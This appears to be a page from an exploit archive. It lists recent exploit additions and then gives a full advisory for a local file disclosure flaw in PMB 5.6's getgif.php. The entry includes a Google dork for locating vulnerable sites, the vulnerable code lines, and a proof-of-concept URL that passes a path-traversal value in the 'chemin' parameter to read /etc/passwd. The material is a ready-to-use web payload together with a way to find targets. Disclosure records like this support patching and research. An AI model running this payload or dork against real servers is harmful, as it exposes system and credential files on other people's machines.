c7e37046e7
12 changes to exploits/shellcodes KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path Cisco 7937G - DoS/Privilege Escalation Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated) Water Billing System 1.0 - 'id' SQL Injection (Authenticated) Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated) User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection PMB 5.6 - 'chemin' Local File Disclosure Car Rental Management System 1.0 - Remote Code Execution (Authenticated) Car Rental Management System 1.0 - 'car_id' Sql Injection
23 lines
No EOL
759 B
Text
23 lines
No EOL
759 B
Text
# Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure
|
|
# Date: 2020-10-13
|
|
# Google Dork: inurl:opac_css
|
|
# Exploit Author: 41-trk (Tarik Bakir)
|
|
# Vendor Homepage: http://www.sigb.net
|
|
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
|
|
# Affected versions : <= 5.6
|
|
# Tested on: Ubuntu 18.04.1
|
|
|
|
The PMB Gif Image is not sanitizing the 'chemin',
|
|
which leads to Local File Disclosure.
|
|
|
|
As of today (2020-10-13) this issue is unfixed.
|
|
|
|
Vulnerable code: (getgif.php )
|
|
|
|
line 55 $fp2=@fopen($chemin, "rb");
|
|
line 68 fpassthru($fp)
|
|
|
|
|
|
========================= Proof-of-Concept ===================================================
|
|
|
|
http://127.0.0.1:2121/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik |